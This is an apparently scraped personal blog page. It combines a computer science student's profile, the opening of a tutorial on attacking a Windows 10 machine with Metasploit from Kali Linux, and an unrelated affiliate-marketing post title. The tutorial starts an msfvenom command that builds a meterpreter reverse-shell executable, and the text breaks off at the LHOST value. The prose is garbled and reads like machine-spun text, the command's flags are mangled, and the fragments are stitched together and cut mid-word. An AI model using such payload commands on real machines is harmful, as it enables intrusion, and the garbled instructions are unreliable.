
Personal Blog

Profile About me I am currently pursuing my Under Graduate in Computer Science and Engineering. I love structure and order and I also stand for quality. I love spending time on fixing little details and optimizing security of applications and networks. Also I like working in a team, you'll learn faster and much more. As the saying goes: 'two heads are better than one'. Details Name: Keshav Kumar Gupta Location: Kathmandu, Nepal Educations Sree Vidyanikethan Engineering College Jul 2018 - May 2022 Bachelor- Computer Science and Engineering The education was mainly programming based, but I also learned about SQL, PHP, and more. During my time in college, I specialized in multimedia. Here I learned about gaming- the importance of OOP, web, user experience and design. I also learned about Networking and Security so I could pursue my dream of Cybersecurity. Canvas Int'l College Mar 2013 - Jun 2015 Highschool - +2(Science) I graduated high school, where I enjoyed doing scienc

How to attack Windows 10 metasploit machine on Kali Linux(2021)[Updated]

Problem Statement: Create a blog page on any topic.  AIM: To create a blogpage on any topic How to attack Windows 10 metasploit machine on Kali Linux. The Metasploit Framework is a framework used by hackers worldwide. Allows cybercriminals to stop the audience from building a convenient location (referred to as a Meterpreter) to use the damaged equipment. In this article, we will look at how this framework within Kali Linux can be used to attack a Windows 10 machine. We will do this with a malicious usable file, using Shell. This article assumes that the installation of Kali Linux has been done and is accessible via a bridge connection from a Windows machine to VirtualBox. Infosec Skills Challenge Join the quest for new skills, pride rights and more than $ 1,000 prizes. Do you accept the challenge? Creating malicious .exe file To create a usable, you will use msfvenom as shown in the command below: msfvenom -p windows / meterpreter / reverse_tcp -a x86 -platform windows -f exe LHOST =

The 3 Easiest Ways For Newbies To Start In Affiliate Marketing

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